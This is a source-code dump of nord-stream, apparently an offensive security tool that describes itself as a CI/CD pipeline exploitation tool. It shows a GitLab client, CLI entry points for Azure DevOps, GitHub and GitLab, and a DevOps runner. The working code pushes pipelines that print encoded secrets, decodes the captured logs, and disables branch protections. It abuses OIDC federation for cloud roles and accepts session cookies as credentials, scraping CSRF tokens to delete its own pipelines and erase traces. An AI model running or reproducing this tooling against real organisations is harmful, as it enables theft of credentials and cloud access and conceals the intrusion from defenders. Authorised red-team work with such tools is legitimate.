f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines/{pipelineId}/jobs"
)
if status_code == 403:
raise GitLabError(response.get("message"))
# reverse the list to get the first job at the first position
return response[::-1]
def downloadPipelineOutput(self, project, pipelineId):
projectPath = project.get("path_with_namespace")
self.__createOutputDir(projectPath)
projectId = project.get("id")
jobs = self.__getJobs(projectId, pipelineId)
date = time.strftime("%Y-%m-%d_%H-%M-%S")
f = open(f"{self._outputDir}/{projectPath}/pipeline_{date}.log", "w")
if len(jobs) == 0:
return None
for job in jobs:
jobId = job.get("id")
jobName = job.get("name", "")
jobStage = job.get("stage", "")
jobStatus = job.get("status", "")
output = self.__getTraceForJobId(projectId, jobId)
if jobStatus != "skipped":
f.write(f"[+] {jobName} (stage={jobStage})\n")
f.write(output)
f.close()
return f"pipeline_{date}.log"
def __getTraceForJobId(self, projectId, jobId):
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/jobs/{jobId}/trace")
if response.status_code != 200:
for i in range(self._maxRetry):
logger.warning(f"Output not ready, sleeping for {self._sleepTime}s")
time.sleep(self._sleepTime)
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/jobs/{jobId}/trace")
if response.status_code == 200:
break
if i == (self._maxRetry - 1):
logger.error("Output still not ready, error!")
return None
return response.text
def __deletePipeline(self, projectId):
logger.debug("Deleting pipeline")
status_code, response = self.__paginatedGet(
f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines?ref={self._branchName}&username={self._gitlabLogin}"
)
headers = {}
# Get CSRF token when using session cookie otherwise we can't delete a pipeline
if isGitLabSessionCookie(self._token):
html_content = self._session.get(f"{self._gitlabURL}/").text
pattern = r'<meta name="csrf-token" content="([^"]+)"'
match = re.search(pattern, html_content)
csrf_token = match.group(1)
headers["x-csrf-token"] = csrf_token
for pipeline in response:
# additional checks for non default branches
# we don't want to remove legitimate logs
if self._branchName != self._DEFAULT_BRANCH_NAME:
commitId = pipeline.get("sha")
response = self._session.get(
f"{self._gitlabURL}/api/v4/projects/{projectId}/repository/commits/{commitId}"
).json()
if response.get("title") not in [Git.ATTACK_COMMIT_MSG, Git.CLEAN_COMMIT_MSG]:
continue
if response.get("author_name") != Git.USER:
continue
pipelineId = pipeline.get("id")
graphQL = {
"operationName": "deletePipeline",
"variables": {"id": f"gid://gitlab/Ci::Pipeline/{pipelineId}"},
"query": "mutation deletePipeline($id: CiPipelineID!) {\n pipelineDestroy(input: {id: $id}) {\n errors\n __typename\n }\n}\n",
}
response = self._session.post(f"{self._gitlabURL}/api/graphql", json=graphQL, headers=headers)
def cleanAllLogs(self, projectId):
# deleting the pipeline removes everything
self.__deletePipeline(projectId)
# not working
def __cleanEvents(self, projectId):
logger.debug(f"Deleting events for project: {projectId}")
i = 1
while True:
params = {"per_page": 100, "page": i}
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/events", params=params)
if response.status_code == 200:
if len(response.json()) == 0:
break
for event in response.json():
eventId = event.get("id")
# doesn't work
response = self._session.delete(f"{self._gitlabURL}/api/v4/projects/{projectId}/events/{eventId}")
i += 1
else:
logger.error("Error while retrieving event")
logger.debug(response.json())
def getBranchesProtectionRules(self, projectId):
logger.debug("Getting branch protection rules")
status_code, response = self.__paginatedGet(f"{self._gitlabURL}/api/v4/projects/{projectId}/protected_branches")
if status_code == 403:
raise GitLabError(response.get("message"))
return response
def getBranches(self, projectId):
logger.debug("Getting branch protection rules (limited)")
status_code, response = self.__paginatedGet(
f"{self._gitlabURL}/api/v4/projects/{projectId}/repository/branches"
)
if status_code == 403:
raise GitLabError(response.get("message"))
# sometimes GitLab returns a 404 instead of an empty array
if status_code == 404:
project = self.getProject(projectId)
# if the repo is empty raise an error since there is no branch
if project.get("empty_repo"):
raise GitLabError("The project is empty and has no branches.")
else:
raise GitLabError("Got 404 for unknown reason.")
return response
def getProject(self, projectId):
logger.debug("Getting project: {projectId}")
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}")
if response.status_code != 200:
raise GitLabError(response.json().get("message"))
else:
return response.json()
def getFailureReasonPipeline(self, projectId, pipelineId):
response = self._session.get(f"{self._gitlabURL}/api/v4/projects/{projectId}/pipelines/{pipelineId}").json()
return response.get("yaml_errors", None)
def getFailureReasonJobs(self, projectId, pipelineId):
res = []
jobs = self.__getJobs(projectId, pipelineId)
for job in jobs:
failure = {}
failure["name"] = job.get("name", "")
failure["stage"] = job.get("stage", "")
failure["failure_reason"] = job.get("failure_reason", "")
if failure["failure_reason"] != "":
res.append(failure)
return res
================================================
FILE: nordstream/commands/devops.py
================================================
"""
CICD pipeline exploitation tool
Usage:
nord-stream devops [options] --token <pat> --org <org> [extraction] [--project <project> --write-filter --no-clean --branch-name <name> --pipeline-name <name> --pipeline-file <filename> --repo-name <name> --pool-name <name> --os <os> --default-agent <name> --sleep <int>]
nord-stream devops [options] --token <pat> --org <org> --yaml <yaml> --project <project> [--write-filter --no-clean --branch-name <name> --pipeline-name <name> --pipeline-file <filename> --repo-name <name> --sleep <int>]
nord-stream devops [options] --token <pat> --org <org> --build-yaml <output> [--build-type <type>] [--pool-name <name>] [--os linux|windows]
nord-stream devops [options] --token <pat> --org <org> --clean-logs [--project <project>]
nord-stream devops [options] --token <pat> --org <org> --list-projects [--write-filter]
nord-stream devops [options] --token <pat> --org <org> --list-repositories [--project <project>]
nord-stream devops [options] --token <pat> --org <org> (--list-secrets [--project <project> --write-filter] | --list-users)
nord-stream devops [options] --token <pat> --org <org> --describe-token
nord-stream devops [options] --token <pat> --list-orgs
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
--ignore-cert Allow insecure server connections
Commit:
--user <user> User used to commit
--email <email> Email address used to commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <pat> Azure DevOps personal token or JWT
--org <org> Org name
-p, --project <project> Run on selected project (can be a file)
-y, --yaml <yaml> Run arbitrary job
--clean-logs Delete all pipelines created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean pipeline logs (default false)
--list-projects List all projects.
--list-repositories List all repositories.
--list-secrets List all secrets.
--list-users List all users.
--write-filter Filter projects where current user has write or admin access.
--build-yaml <output> Create a pipeline yaml file with default configuration.
--build-type <type> Type used to generate the yaml file, can be: default, azurerm, github, aws, sonar, ssh
--describe-token Display information on the token
--branch-name <name> Use specific branch name for deployment.
--pipeline-name <name> Use specific pipeline name for deployment.
--pipeline-file <filename> Pipeline filename (default: azure-pipelines.yml).
--repo-name <name> Use specific repo for deployment.
--pool-name <name> Use specific pool name for deployment. This value will be set as the pool name in the YAML file
--default-agent <name> Use specific default agent pool for deployment. This value will be used as the default agent pool for the pipeline
--os [linux | windows] The agent's OS where the pipeline will be run. Defaults to linux
--sleep <int> Sleep this amount of time before retrieving pipeline result (15s by default)
Extraction:
--extract <list> Extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
--no-extract <list> Don't extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
Examples:
List all secrets from all projects
$ nord-stream devops --token "$PAT" --org myorg --list-secrets
Dump all secrets from all projects
$ nord-stream devops --token "$PAT" --org myorg
Authors: @hugow @0hexit
"""
from docopt import docopt
from nordstream.cicd.devops import DevOps
from nordstream.core.devops.devops import DevOpsRunner
from nordstream.git import Git
from nordstream.utils.log import NordStreamLog, logger
from nordstream.utils.devops import listOrgs
def start(argv):
args = docopt(__doc__, argv=argv)
if args["--verbose"]:
NordStreamLog.setVerbosity(verbose=1)
if args["--debug"]:
NordStreamLog.setVerbosity(verbose=2)
logger.debug(args)
if args["--list-orgs"]:
listOrgs(args["--token"])
return
# check validity of the token
if not DevOps.checkToken(args["--token"], args["--org"], (not args["--ignore-cert"])):
logger.critical("Invalid token or org.")
# devops setup
devops = DevOps(args["--token"], args["--org"], (not args["--ignore-cert"]))
if args["--output-dir"]:
devops.outputDir = args["--output-dir"] + "/"
if args["--branch-name"]:
devops.branchName = args["--branch-name"]
if args["--pipeline-name"]:
devops.pipelineName = args["--pipeline-name"]
if args["--repo-name"]:
devops.repoName = args["--repo-name"]
if args["--default-agent"]:
devops.defaultAgentPool = args["--default-agent"]
if args["--sleep"]:
devops.sleepTime = args["--sleep"]
devopsRunner = DevOpsRunner(devops)
if args["--key-id"]:
Git.KEY_ID = args["--key-id"]
if args["--user"]:
Git.USER = args["--user"]
if args["--email"]:
Git.EMAIL = args["--email"]
if args["--pipeline-file"]:
devopsRunner.pipelineFilename = args["--pipeline-file"]
if args["--yaml"]:
devopsRunner.yaml = args["--yaml"]
if args["--write-filter"]:
devopsRunner.writeAccessFilter = args["--write-filter"]
if args["--pool-name"]:
devopsRunner.poolName = args["--pool-name"]
if args["--os"]:
devopsRunner.os = args["--os"].lower()
if args["--extract"] and args["--no-extract"]:
logger.critical("Can't use both --service-connection and --no-service-connection option.")
if args["--extract"]:
devopsRunner.parseExtractList(args["--extract"])
if args["--no-extract"]:
devopsRunner.parseExtractList(args["--no-extract"], False)
if args["--no-clean"]:
devopsRunner.cleanLogs = not args["--no-clean"]
if args["--describe-token"]:
devopsRunner.describeToken()
return
devopsRunner.getProjects(args["--project"])
# logic
if args["--list-projects"]:
devopsRunner.listDevOpsProjects()
elif args["--list-repositories"]:
devopsRunner.listDevOpsRepositories()
elif args["--list-users"]:
devopsRunner.listDevOpsUsers()
elif args["--list-secrets"]:
devopsRunner.listProjectSecrets()
elif args["--clean-logs"]:
devopsRunner.manualCleanLogs()
elif args["--build-yaml"]:
devopsRunner.output = args["--build-yaml"]
devopsRunner.createYaml(args["--build-type"])
else:
devopsRunner.runPipeline()
================================================
FILE: nordstream/commands/github.py
================================================
"""
CICD pipeline exploitation tool
Usage:
nord-stream github [options] --token <ghp> --org <org> [--repo <repo> --no-repo --no-env --no-org --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --yaml <yaml> --repo <repo> [--env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> ([--clean-logs] [--clean-branch-policy]) [--repo <repo> --branch-name <name>]
nord-stream github [options] --token <ghp> --org <org> --build-yaml <filename> --repo <repo> [--build-type <type> --env <env>]
nord-stream github [options] --token <ghp> --org <org> --azure-tenant-id <tenant> --azure-client-id <client> [--repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --aws-role <role> --aws-region <region> [--repo <repo> --env <env> --disable-protections --branch-name <name> --no-clean]
nord-stream github [options] --token <ghp> --org <org> --list-protections [--repo <repo> --branch-name <name> --disable-protections]
nord-stream github [options] --token <ghp> --org <org> --list-secrets [--repo <repo> --no-repo --no-env --no-org]
nord-stream github [options] --token <ghp> [--org <org>] --list-repos [--write-filter]
nord-stream github [options] --token <ghp> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
Commit:
--user <user> User used to commit
--email <email> Email address used to commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <ghp> Github personal token
--org <org> Org name
-r, --repo <repo> Run on selected repo (can be a file)
-y, --yaml <yaml> Run arbitrary job
--clean-logs Delete all logs created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean workflow logs (default false)
--clean-branch-policy Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered.
--build-yaml <filename> Create a pipeline yaml file with all secrets.
--build-type <type> Type used to generate the yaml file, can be: default, azureoidc, awsoidc
--env <env> Specify env for the yaml file creation.
--no-repo Don't extract repo secrets.
--no-env Don't extract environment secrets.
--no-org Don't extract organization secrets.
--azure-tenant-id <tenant> Identifier of the Azure tenant associated with the application having federated credentials (OIDC related).
--azure-subscription-id <subscription> Identifier of the Azure subscription associated with the application having federated credentials (OIDC related).
--azure-client-id <client> Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related).
--aws-role <role> AWS role to assume (OIDC related).
--aws-region <region> AWS region (OIDC related).
--list-protections List all protections.
--list-repos List all repos.
--list-secrets List all secrets.
--disable-protections Disable the branch protection rules (needs admin rights)
--write-filter Filter repos where current user has write or admin access.
--force Don't check environment and branch protections.
--branch-name <name> Use specific branch name for deployment.
--describe-token Display information on the token
Examples:
List all secrets from all repositories
$ nord-stream github --token "$GHP" --org myorg --list-secrets
Dump all secrets from all repositories and try to disable branch protections
$ nord-stream github --token "$GHP" --org myorg --disable-protections
Authors: @hugow @0hexit
"""
from docopt import docopt
from nordstream.cicd.github import GitHub
from nordstream.core.github.github import GitHubWorkflowRunner
from nordstream.utils.log import logger, NordStreamLog
from nordstream.git import Git
def start(argv):
args = docopt(__doc__, argv=argv)
if args["--verbose"]:
NordStreamLog.setVerbosity(verbose=1)
if args["--debug"]:
NordStreamLog.setVerbosity(verbose=2)
logger.debug(args)
# check validity of the token
if not GitHub.checkToken(args["--token"]):
logger.critical("Invalid token.")
# github setup
gitHub = GitHub(args["--token"])
if args["--output-dir"]:
gitHub.outputDir = args["--output-dir"] + "/"
if args["--org"]:
gitHub.org = args["--org"]
if args["--branch-name"]:
gitHub.branchName = args["--branch-name"]
logger.info(f'Using branch: "{gitHub.branchName}"')
if args["--key-id"]:
Git.KEY_ID = args["--key-id"]
if args["--user"]:
Git.USER = args["--user"]
if args["--email"]:
Git.EMAIL = args["--email"]
# runner setup
gitHubWorkflowRunner = GitHubWorkflowRunner(gitHub, args["--env"])
if args["--no-repo"]:
gitHubWorkflowRunner.extractRepo = not args["--no-repo"]
if args["--no-env"]:
gitHubWorkflowRunner.extractEnv = not args["--no-env"]
if args["--no-org"]:
gitHubWorkflowRunner.extractOrg = not args["--no-org"]
if args["--yaml"]:
gitHubWorkflowRunner.yaml = args["--yaml"]
if args["--disable-protections"]:
gitHubWorkflowRunner.disableProtections = args["--disable-protections"]
if args["--write-filter"]:
gitHubWorkflowRunner.writeAccessFilter = args["--write-filter"]
if args["--force"]:
gitHubWorkflowRunner.forceDeploy = args["--force"]
if args["--aws-role"] or args["--azure-tenant-id"]:
gitHubWorkflowRunner.exploitOIDC = True
if args["--azure-tenant-id"]:
gitHubWorkflowRunner.tenantId = args["--azure-tenant-id"]
if args["--azure-subscription-id"]:
gitHubWorkflowRunner.subscriptionId = args["--azure-subscription-id"]
if args["--azure-client-id"]:
gitHubWorkflowRunner.clientId = args["--azure-client-id"]
if args["--aws-role"]:
gitHubWorkflowRunner.role = args["--aws-role"]
if args["--aws-region"]:
gitHubWorkflowRunner.region = args["--aws-region"]
if args["--no-clean"]:
gitHubWorkflowRunner.cleanLogs = not args["--no-clean"]
# logic
if args["--describe-token"]:
gitHubWorkflowRunner.describeToken()
elif args["--list-repos"]:
gitHubWorkflowRunner.getRepos(args["--repo"])
gitHubWorkflowRunner.listGitHubRepos()
elif args["--list-secrets"]:
gitHubWorkflowRunner.getRepos(args["--repo"])
gitHubWorkflowRunner.listGitHubSecrets()
elif args["--build-yaml"]:
gitHubWorkflowRunner.writeAccessFilter = True
gitHubWorkflowRunner.workflowFilename = args["--build-yaml"]
gitHubWorkflowRunner.createYaml(args["--repo"], args["--build-type"])
# Cleaning
elif args["--clean-logs"] or args["--clean-branch-policy"]:
gitHubWorkflowRunner.getRepos(args["--repo"])
if args["--clean-logs"]:
gitHubWorkflowRunner.manualCleanLogs()
if args["--clean-branch-policy"]:
gitHubWorkflowRunner.manualCleanBranchPolicy()
elif args["--list-protections"]:
gitHubWorkflowRunner.writeAccessFilter = True
gitHubWorkflowRunner.getRepos(args["--repo"])
gitHubWorkflowRunner.checkBranchProtections()
else:
gitHubWorkflowRunner.writeAccessFilter = True
gitHubWorkflowRunner.getRepos(args["--repo"])
gitHubWorkflowRunner.start()
================================================
FILE: nordstream/commands/gitlab.py
================================================
"""
CICD pipeline exploitation tool
Usage:
nord-stream gitlab [options] --token <pat> (--list-secrets | --list-protections) [--project <project> --group <group> --no-project --no-group --no-instance --write-filter --sleep <seconds>]
nord-stream gitlab [options] --token <pat> ( --list-groups | --list-projects | --list-users | --list-runners) [--project <project> --group <group> --write-filter]
nord-stream gitlab [options] --token <pat> --yaml <yaml> --project <project> [--project-path <path> --no-clean]
nord-stream gitlab [options] --token <pat> --clean-logs [--project <project>]
nord-stream gitlab [options] --token <pat> --describe-token
Options:
-h --help Show this screen.
--version Show version.
-v, --verbose Verbose mode
-d, --debug Debug mode
--output-dir <dir> Output directory for logs
--url <gitlab_url> Gitlab URL [default: https://gitlab.com]
--ignore-cert Allow insecure server connections
--membership Limit by projects that the current user is a member of
Commit:
--user <user> User used to commit
--email <email> Email address used to commit
--key-id <id> GPG primary key ID to sign commits
args:
--token <pat> GitLab personal access token or _gitlab_session cookie
--project <project> Run on selected project (can be a file / project id)
--group <group> Run on selected group (can be a file)
--list-secrets List all secrets.
--list-protections List branch protection rules.
--list-projects List all projects.
--list-groups List all groups.
--list-users List all users.
--list-runners List runners through project jobs (unprivileged, but non-exhaustive).
--write-filter Filter repos where current user has developer access or more.
--no-project Don't extract project secrets.
--no-group Don't extract group secrets.
--no-instance Don't extract instance secrets.
-y, --yaml <yaml> Run arbitrary job
--branch-name <name> Use specific branch name for deployment.
--clean-logs Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered.
--no-clean Don't clean pipeline logs (default false)
--describe-token Display information on the token
--sleep <seconds> Time to sleep in seconds between each secret request.
--project-path <path> Local path of the git folder.
Examples:
Dump all secrets
$ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets
Deploy the custom pipeline on the master branch
$ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch master --project 'group/projectname'
Authors: @hugow @0hexit
"""
from docopt import docopt
from nordstream.cicd.gitlab import GitLab
from nordstream.core.gitlab.gitlab import GitLabRunner
from nordstream.utils.log import logger, NordStreamLog
from nordstream.git import Git
def start(argv):
args = docopt(__doc__, argv=argv)
if args["--verbose"]:
NordStreamLog.setVerbosity(verbose=1)
if args["--debug"]:
NordStreamLog.setVerbosity(verbose=2)
logger.debug(args)
# check validity of the token
if not GitLab.checkToken(args["--token"], args["--url"], (not args["--ignore-cert"])):
logger.critical('Invalid token or the token doesn\'t have the "api" scope.')
# gitlab setup
gitlab = GitLab(args["--url"], args["--token"], (not args["--ignore-cert"]))
if args["--output-dir"]:
gitlab.outputDir = args["--output-dir"] + "/"
gitLabRunner = GitLabRunner(gitlab)
if args["--key-id"]:
Git.KEY_ID = args["--key-id"]
if args["--user"]:
Git.USER = args["--user"]
if args["--email"]:
Git.EMAIL = args["--email"]
if args["--branch-name"]:
gitlab.branchName = args["--branch-name"]
logger.info(f'Using branch: "{gitlab.branchName}"')
# config
if args["--write-filter"]:
gitLabRunner.writeAccessFilter = args["--write-filter"]
if args["--no-project"]:
gitLabRunner.extractProject = not args["--no-project"]
if args["--no-group"]:
gitLabRunner.extractGroup = not args["--no-group"]
if args["--no-instance"]:
gitLabRunner.extractInstance = not args["--no-instance"]
if args["--no-clean"]:
gitLabRunner.cleanLogs = not args["--no-clean"]
if args["--yaml"]:
gitLabRunner.yaml = args["--yaml"]
if args["--sleep"]:
gitLabRunner.sleepTime = args["--sleep"]
if args["--project-path"]:
gitLabRunner.localPath = args["--project-path"]
# logic
if args["--describe-token"]:
gitLabRunner.describeToken()
elif args["--list-projects"]:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
gitLabRunner.listGitLabProjects()
elif args["--list-protections"]:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
gitLabRunner.listBranchesProtectionRules()
elif args["--list-groups"]:
gitLabRunner.getGroups(args["--group"])
gitLabRunner.listGitLabGroups()
elif args["--list-users"]:
gitLabRunner.listGitLabUsers()
elif args["--list-runners"]:
if gitLabRunner.extractProject:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
if gitLabRunner.extractGroup:
gitLabRunner.getGroups(args["--group"])
gitLabRunner.listGitLabRunners()
elif args["--list-secrets"]:
if gitLabRunner.extractProject:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
if gitLabRunner.extractGroup:
gitLabRunner.getGroups(args["--group"])
gitLabRunner.listGitLabSecrets()
elif args["--clean-logs"]:
gitLabRunner.getProjects(args["--project"], membership=args["--membership"])
gitLabRunner.manualCleanLogs()
else:
gitLabRunner.getProjects(args["--project"], strict=True, membership=args["--membership"])
gitLabRunner.runPipeline()
================================================
FILE: nordstream/core/devops/devops.py
================================================
import base64
import logging
import subprocess
import time
from os import chdir, makedirs
from os.path import exists, realpath
from nordstream.git import Git
from nordstream.utils.errors import DevOpsError, GitError, RepoCreationError
from nordstream.utils.helpers import isAllowed
from nordstream.utils.log import logger
from nordstream.yaml.devops import DevOpsPipelineGenerator
class DevOpsRunner:
_cicd = None
_extractVariableGroups = True
_extractSecureFiles = True
_extractAzureServiceconnections = True
_extractGitHubServiceconnections = True
_extractAWSServiceconnections = True
_extractSonarServiceconnections = True
_extractSSHServiceConnections = True
_yaml = None
_writeAccessFilter = False
_poolName = None
_os = "linux"
_pipelineFilename = "azure-pipelines.yml"
_output = None
_cleanLogs = True
_resType = {"default": 0, "doubleb64": 1, "github": 2, "azurerm": 3}
_pushedCommitsCount = 0
_branchAlreadyExists = False
_allowedTypes = ["azurerm", "github", "aws", "sonarqube", "ssh"]
def __init__(self, cicd):
self._cicd = cicd
self.__createLogDir()
@property
def extractVariableGroups(self):
return self._extractVariableGroups
@extractVariableGroups.setter
def extractVariableGroups(self, value):
self._extractVariableGroups = value
@property
def extractSecureFiles(self):
return self._extractSecureFiles
@extractSecureFiles.setter
def extractSecureFiles(self, value):
self._extractSecureFiles = value
@property
def extractAzureServiceconnections(self):
return self._extractAzureServiceconnections
@extractAzureServiceconnections.setter
def extractAzureServiceconnections(self, value):
self._extractAzureServiceconnections = value
@property
def extractGitHubServiceconnections(self):
return self._extractGitHubServiceconnections
@extractGitHubServiceconnections.setter
def extractGitHubServiceconnections(self, value):
self._extractGitHubServiceconnections = value
@property
def extractAWSServiceconnections(self):
return self._extractAWSServiceconnections
@extractAWSServiceconnections.setter
def extractAWSServiceconnections(self, value):
self._extractAWSServiceconnections = value
@property
def extractSonarServiceconnections(self):
return self._extractSonarServiceconnections
@extractSonarServiceconnections.setter
def extractSonarServiceconnections(self, value):
self._extractSonarServiceconnections = value
@property
def extractSSHServiceConnections(self):
return self._extractSSHServiceConnections
@extractSSHServiceConnections.setter
def extractSSHServiceConnections(self, value):
self._extractSSHServiceConnections = value
@property
def output(self):
return self._output
@output.setter
def output(self, value):
self._output = value
@property
def cleanLogs(self):
return self._cleanLogs
@cleanLogs.setter
def cleanLogs(self, value):
self._cleanLogs = value
@property
def yaml(self):
return self._yaml
@yaml.setter
def yaml(self, value):
self._yaml = realpath(value)
@property
def pipelineFilename(self):
return self._pipelineFilename
@pipelineFilename.setter
def pipelineFilename(self, value):
self._pipelineFilename = value
@property
def writeAccessFilter(self):
return self._writeAccessFilter
@writeAccessFilter.setter
def writeAccessFilter(self, value):
self._writeAccessFilter = value
@property
def poolName(self):
return self._poolName
@poolName.setter
def poolName(self, value):
self._poolName = value
@property
def os(self):
return self._os
@os.setter
def os(self, value):
self._os = value
def __createLogDir(self):
self._cicd.outputDir = realpath(self._cicd.outputDir) + "/azure_devops"
makedirs(self._cicd.outputDir, exist_ok=True)
def listDevOpsProjects(self):
logger.info("Listing all projects:")
for p in self._cicd.projects:
name = p.get("name")
logger.raw(f"- {name}\n", level=logging.INFO)
def listDevOpsRepositories(self):
logger.info("Listing all repositories:")
for p in self._cicd.projects:
project_name = p.get("name")
for r in self._cicd.listRepositories(project_name):
name = r.get("name")
logger.raw(f"- {project_name}/{name}\n", level=logging.INFO)
def listDevOpsUsers(self):
logger.info("Listing all users:")
for p in self._cicd.listUsers():
origin = p.get("origin")
displayName = p.get("displayName")
mailAddress = p.get("mailAddress")
res = f"- {displayName}"
if mailAddress != "":
res += f" / {mailAddress}"
res += f" ({origin})\n"
logger.raw(res, level=logging.INFO)
def getProjects(self, project):
if project:
if exists(project):
with open(project, "r") as file:
for project in file:
self._cicd.addProject(project.strip())
else:
self._cicd.addProject(project)
else:
self._cicd.listProjects()
if self._writeAccessFilter:
self._cicd.filterWriteProjects()
if len(self._cicd.projects) == 0:
if self._writeAccessFilter:
logger.critical("No project with write access found.")
else:
logger.critical("No project found.")
def listProjectSecrets(self):
logger.info("Listing secrets")
for project in self._cicd.projects:
projectName = project.get("name")
projectId = project.get("id")
logger.info(f'"{projectName}" secrets')
self.__displayProjectVariableGroupsSecrets(projectId)
self.__displayProjectSecureFiles(projectId)
self.__displayServiceConnections(projectId)
logger.empty_line()
def __displayProjectVariableGroupsSecrets(self, project):
try:
secrets = self._cicd.listProjectVariableGroupsSecrets(project)
except DevOpsError as e:
logger.error(e)
else:
if len(secrets) != 0:
for variableGroup in secrets:
logger.info(f"Variable group: \"{variableGroup.get('name')}\"")
for sec in variableGroup.get("variables"):
logger.raw(f"\t- {sec}\n", logging.INFO)
def __displayProjectSecureFiles(self, project):
try:
secureFiles = self._cicd.listProjectSecureFiles(project)
except DevOpsError as e:
logger.error(e)
else:
if secureFiles:
for sf in secureFiles:
logger.info(f'Secure file: "{sf["name"]}"')
def __displayServiceConnections(self, projectId):
try:
serviceConnections = self._cicd.listServiceConnections(projectId)
except DevOpsError as e:
logger.error(e)
else:
if len(serviceConnections) != 0:
logger.info("Service connections:")
for sc in serviceConnections:
scType = sc.get("type")
scName = sc.get("name")
logger.raw(f"\t- {scName} ({scType})\n", logging.INFO)
def __checkSecrets(self, project):
projectId = project.get("id")
projectName = project.get("name")
secrets = 0
if (
self._extractAzureServiceconnections
or self._extractGitHubServiceconnections
or self._extractAWSServiceconnections
or self._extractSonarServiceconnections
or self._extractSSHServiceConnections
):
try:
secrets += len(self._cicd.listServiceConnections(projectId))
except DevOpsError as e:
logger.error(f"Error while listing service connection: {e}")
if self._extractVariableGroups:
try:
secrets += len(self._cicd.listProjectVariableGroupsSecrets(projectId))
except DevOpsError as e:
logger.error(f"Error while listing variable groups: {e}")
if self._extractSecureFiles:
try:
secrets += len(self._cicd.listProjectSecureFiles(projectId))
except DevOpsError as e:
logger.error(f"Error while listing secure files: {e}")
if secrets == 0:
logger.info(f'No secrets found for project "{projectName}" / "{projectId}"')
return False
return True
def createYaml(self, pipelineType):
pipelineGenerator = DevOpsPipelineGenerator()
if pipelineType == "github":
pipelineGenerator.generatePipelineForGitHub("#FIXME", self._poolName, self._os)
elif pipelineType == "azurerm":
pipelineGenerator.generatePipelineForAzureRm("#FIXME", self._poolName, self._os)
elif pipelineType == "aws":
pipelineGenerator.generatePipelineForAWS("#FIXME", self._poolName, self._os)
elif pipelineType == "sonar":
pipelineGenerator.generatePipelineForSonar("#FIXME", self._poolName, self._os)
elif pipelineType == "ssh":
pipelineGenerator.generatePipelineForSSH("#FIXME", self._poolName, self._os)
else:
pipelineGenerator.generatePipelineForSecretExtraction({"name": "", "variables": ""}, self._poolName, self._os)
logger.success("YAML file: ")
pipelineGenerator.displayYaml()
pipelineGenerator.writeFile(self._output)
def __extractPipelineOutput(self, projectId, resType=0, resultsFilename="secrets.txt"):
with open(
f"{self._cicd.outputDir}/{self._cicd.org}/{projectId}/{self._fileName}",
"rb",
) as output:
try:
if resType == self._resType["doubleb64"]:
pipelineResults = self.__doubleb64(output)
elif resType == self._resType["github"]:
pipelineResults = self.__extractGitHubResults(output)
elif resType == self._resType["azurerm"]:
pipelineResults = self.__azureRm(output)
elif resType == self._resType["default"]:
pipelineResults = output.read()
else:
logger.exception("Invalid type checkout: _resType")
except:
output.seek(0)
pipelineResults = output.read()
logger.success("Output:")
logger.raw(pipelineResults, logging.INFO)
with open(f"{self._cicd.outputDir}/{self._cicd.org}/{projectId}/{resultsFilename}", "ab") as file:
file.write(pipelineResults)
@staticmethod
def __extractGitHubResults(output):
decoded = DevOpsRunner.__doubleb64(output)
for line in decoded.split(b"\n"):
if b"AUTHORIZATION" in line:
try:
return base64.b64decode(line.split(b" ")[-1]) + b"\n"
except Exception as e:
logger.error(e)
return None
@staticmethod
def __doubleb64(output):
# the secret blob is double base64-encoded as the second field of the third-to-last output line
data = output.readlines()[-3].split(b" ")[1]
return base64.b64decode(base64.b64decode(data))
@staticmethod
def __azureRm(output):
# same double base64-encoded format as __doubleb64
data = output.readlines()[-3].split(b" ")[1]
return base64.b64decode(base64.b64decode(data))
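# Hedged sketch of the log format assumed by the two helpers above: the generated
# pipeline is expected to print a double base64-encoded blob as the second field of
# the third-to-last output line, so decoding it twice recovers the plaintext, e.g.:
#   blob = base64.b64encode(base64.b64encode(b"SECRET=value"))
#   line = b"output: " + blob
#   assert base64.b64decode(base64.b64decode(line.split(b" ")[1])) == b"SECRET=value"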
def __launchPipeline(self, project, pipelineId, pipelineGenerator):
logger.verbose(f"Launching pipeline.")
pipelineGenerator.writeFile(f"./{self._pipelineFilename}")
pushOutput = Git.gitPush(self._cicd.branchName)
pushOutput.wait()
try:
if b"Everything up-to-date" in pushOutput.communicate()[1].strip():
logger.error("Error when pushing code: Everything up-to-date")
logger.warning(
"Your trying to push the same code on an existing branch, modify the yaml file to push it."
)
elif pushOutput.returncode != 0:
logger.error("Error when pushing code:")
logger.raw(pushOutput.communicate()[1], logging.INFO)
else:
self._pushedCommitsCount += 1
logger.raw(pushOutput.communicate()[1])
# manual trigger because otherwise it is difficult to get the right runId
run = self._cicd.runPipeline(project, pipelineId)
self.__checkRunErrors(run)
runId = run.get("id")
pipelineStatus = self._cicd.waitPipeline(project, pipelineId, runId)
if pipelineStatus == "succeeded":
logger.success("Pipeline has successfully terminated.")
return runId
elif pipelineStatus == "failed":
self.__displayFailureReasons(project, runId)
return None
except Exception as e:
logger.error(e)
finally:
pass
